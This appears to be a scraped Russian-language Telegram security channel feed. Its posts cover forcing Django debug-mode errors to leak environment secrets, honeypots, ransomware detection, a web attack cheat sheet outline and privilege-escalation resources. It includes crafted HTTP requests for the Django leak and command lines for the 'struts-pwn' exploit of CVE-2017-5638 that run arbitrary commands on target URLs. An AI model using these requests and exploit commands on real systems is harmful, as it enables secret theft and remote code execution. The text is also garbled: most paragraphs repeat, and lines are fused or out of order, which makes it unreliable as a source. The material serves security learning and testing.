Forwarded from Кавычка (Bo0oM)
Приложения на Django в debug режиме раскрывают содержимое environment переменных при необработанном исключении.
Несмотря на наличие автоматического сокрытия значений, для переменных соответствующих регулярному выражению
Если обнаружить debug режим можно просто обратившись к несуществующей странице, то вызвать exception иногда бывает проблематично. Даже с раскрытием существующих в приложении путей через 404-ую страницу.
Но существуют и более универсальные подходы.
Пример 1
Нестандартные символы в Host. Правда с учетом облачных сервисов этот вариант срабатывает редко.
Использование большего количества переменных в POST, чем указано в настройке DATA_UPLOAD_MAX_NUMBER_FIELDS (по умолчанию 1000).
Для эксплуатации необходимо найти любой роут, поддерживающий POST запросы, и в редких случаях получить валидное значение CSRF токена на странице.
Несмотря на наличие автоматического сокрытия значений, для переменных соответствующих регулярному выражению
API|TOKEN|KEY|SECRET|PASS|SIGNATURE, часто это приводит к утечкам через нестандартные имена переменных.Если обнаружить debug режим можно просто обратившись к несуществующей странице, то вызвать exception иногда бывает проблематично. Даже с раскрытием существующих в приложении путей через 404-ую страницу.
Но существуют и более универсальные подходы.
Пример 1
Нестандартные символы в Host. Правда с учетом облачных сервисов этот вариант срабатывает редко.
GET / HTTP/1.1Пример 2
Host: '"
Invalid HTTP_HOST header: '\'"'. The domain name provided is not valid according to RFC 1034/1035.
Использование большего количества переменных в POST, чем указано в настройке DATA_UPLOAD_MAX_NUMBER_FIELDS (по умолчанию 1000).
Для эксплуатации необходимо найти любой роут, поддерживающий POST запросы, и в редких случаях получить валидное значение CSRF токена на странице.
POST / HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Cookie: csrftoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;
Content-Length: 3093
csrfmiddlewaretoken=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&x=&x=&x=&x=[..1000 раз..]&x=&x=&x=
👍1
Технология обмана. Что такое Deception и как теперь обманывают хакеров
Ты наверняка слышал про ханипоты — цели-приманки, по атакам на которые вычисляют хакеров. В последние годы эта технология проапгрейдилась и теперь носит общее название Deception. О том, в чем отличия и как хакеров пытаются водить за нос, мы и поговорим.
Слово deception переводится с английского как обман. Это название очень точно отражает суть решения — ведь чтобы поймать атакующего, ловушки должны быть неотличимы от настоящих сервисов.
Ты наверняка слышал про ханипоты — цели-приманки, по атакам на которые вычисляют хакеров. В последние годы эта технология проапгрейдилась и теперь носит общее название Deception. О том, в чем отличия и как хакеров пытаются водить за нос, мы и поговорим.
Слово deception переводится с английского как обман. Это название очень точно отражает суть решения — ведь чтобы поймать атакующего, ловушки должны быть неотличимы от настоящих сервисов.
👍1
Национальная система DNS-спуффинга
12.06.2022 года, в День России, был взломан и “дефейснут” один из сайтов ВГТРК Smotrim[.]ru. Об этом написали несколько СМИ и, на фоне множества дефейсов с 24 февраля, на это никто особого внимания не обратил. Но тут было на что посмотреть с точки зрения того, что именно было взломано.
12.06.2022 года, в День России, был взломан и “дефейснут” один из сайтов ВГТРК Smotrim[.]ru. Об этом написали несколько СМИ и, на фоне множества дефейсов с 24 февраля, на это никто особого внимания не обратил. Но тут было на что посмотреть с точки зрения того, что именно было взломано.
👍1
Обнаружение Ransomware
Многие люди удивлены, узнав, что программы-вымогатели настолько успешны в организациях, где включены все традиционные средства защиты. Большинство организаций, пострадавших от программ-вымогателей, имели современные антивирусы, брандмауэры, фильтрацию контента и все обычные средства защиты, которые, как нам всем говорят, необходимы для успешной защиты от хакеров и вредоносных программ.
Многие люди удивлены, узнав, что программы-вымогатели настолько успешны в организациях, где включены все традиционные средства защиты. Большинство организаций, пострадавших от программ-вымогателей, имели современные антивирусы, брандмауэры, фильтрацию контента и все обычные средства защиты, которые, как нам всем говорят, необходимы для успешной защиты от хакеров и вредоносных программ.
👍1
Web Attack Cheat Sheet
Table of Contents
Table of Contents
Discovering
Targets
IP Enumeration
Subdomain Enumeration
Wayback Machine
Cache
Crawling
Wordlist
Directory Bruteforcing
Parameter Bruteforcing
DNS and HTTP detection
Acquisitions/Names/Addresses/Contacts/Emails/etc.
HTML/JavaScript Comments
Google Dorks
Content Security Policy (CSP)
Tiny URLs Services
GraphQL
General
Enumerating
Fingerprint
Buckets
Cloud Enumeration
Containerization
Visual Identification
Scanning
Static Application Security Testing
Dependency Confusion
Send Emails
Search Vulnerabilities
Web Scanning
HTTP Request Smuggling
Subdomain Takeover
SQLi (SQL Injection)
Repositories Scanning
Secret Scanning
Google Dorks Scanning
CORS Misconfigurations
Monitoring
CVE
Attacking
Brute Force
Exfiltration
General
Manual
Payloads
Bypass
Deserialization
SSRF (Server-Side Request Forgery)
DNS Rebinding
SMTP Header Injection
Reverse Shell
SQLi (SQL Injection)
XPath Injection
LFI (Local File Inclusion)
SSTI (Server Side Template Injection)
WebDAV (Web Distributed Authoring and Versioning)
Generic Tools
General
Trivy
Сканер для поиска уязвимостей в образах контейнеров, файловых системах и репозиториях Git, а также для поиска проблем с конфигурацией и закордкоженных секретов.
Сканер для поиска уязвимостей в образах контейнеров, файловых системах и репозиториях Git, а также для поиска проблем с конфигурацией и закордкоженных секретов.
👍2
Struts PWN
An exploit for Apache Struts CVE-2017-5638.
Использование:
Тестирование одного URL-адреса.
Тестирование списка URL-адресов.
Проверка наличия уязвимости для одного URL-адреса.
Проверка наличия уязвимости по списку URL-адресов.
An exploit for Apache Struts CVE-2017-5638.
Использование:
Тестирование одного URL-адреса.
python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'Тестирование списка URL-адресов.
python struts-pwn.py --list 'urls.txt' -c 'id'Проверка наличия уязвимости для одного URL-адреса.
python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'Проверка наличия уязвимости по списку URL-адресов.
python struts-pwn.py --check --list 'urls.txt'Linux Privilege Escalation Cheatsheet
Эта шпаргалка предназначена для тех, кто готовится к OSCP, чтобы помочь им понять различные методы эскалации привилегий на машинах под управлением Linux и CTF с примерами. Существует множество способов выполнения одних и тех же задач. Мы выполнили и составили этот список на основе нашего опыта.
Эта шпаргалка предназначена для тех, кто готовится к OSCP, чтобы помочь им понять различные методы эскалации привилегий на машинах под управлением Linux и CTF с примерами. Существует множество способов выполнения одних и тех же задач. Мы выполнили и составили этот список на основе нашего опыта.
👍2
Privilege Escalation Cheatsheet (Vulnhub)
Эта шпаргалка предназначена для CTF-игроков и новичков, чтобы помочь им понять основы эскалации привилегий с примерами. Это не шпаргалка по перечислению с помощью команд Linux. Повышение привилегий заключается в правильном перечислении. Существует множество способов выполнения одних и тех же задач. Мы выполнили и составили этот список на основе нашего опыта.
Эта шпаргалка предназначена для CTF-игроков и новичков, чтобы помочь им понять основы эскалации привилегий с примерами. Это не шпаргалка по перечислению с помощью команд Linux. Повышение привилегий заключается в правильном перечислении. Существует множество способов выполнения одних и тех же задач. Мы выполнили и составили этот список на основе нашего опыта.
👍3
Hacking Cisco
Это сборник с огромным списком лабораторий. Вот только начало:
Это сборник с огромным списком лабораторий. Вот только начало:
Lab 001 - OSPF Point-to-Point Mode
Lab 001 - OSPF Point-to-Point Mode - Solution
Lab 002 - OSPF in Broadcast Networks
Lab 003 - OSPF in NBMA Networks
Lab 004 - OSPF in Point-to-Multipoint
Lab 005 - OSPF in Point-to-Multipoint Non-broadcast
Lab 006 - OSPF Multi-Area Network
Lab 007 - OSPF Authentication
METASPLOIT UNLEASHED
Курс Metasploit Unleashed (MSFU) предоставляется бесплатно компанией Offensive Security
Курс Metasploit Unleashed (MSFU) предоставляется бесплатно компанией Offensive Security
👍2
Defend the Web
Defend the Web - это интерактивная платформа безопасности, где вы можете учиться и проверять свои навыки. Попробуйте пройти все наши 60+ хакерских уровней. Изучайте наши статьи, охватывающие все аспекты безопасности. Статьи расскажут вам о самом необходимом для начала работы. По мере вашего продвижения вперед будут появляться более сложные темы, которые помогут вам расширить свои знания.
Defend the Web - это интерактивная платформа безопасности, где вы можете учиться и проверять свои навыки. Попробуйте пройти все наши 60+ хакерских уровней. Изучайте наши статьи, охватывающие все аспекты безопасности. Статьи расскажут вам о самом необходимом для начала работы. По мере вашего продвижения вперед будут появляться более сложные темы, которые помогут вам расширить свои знания.
👍5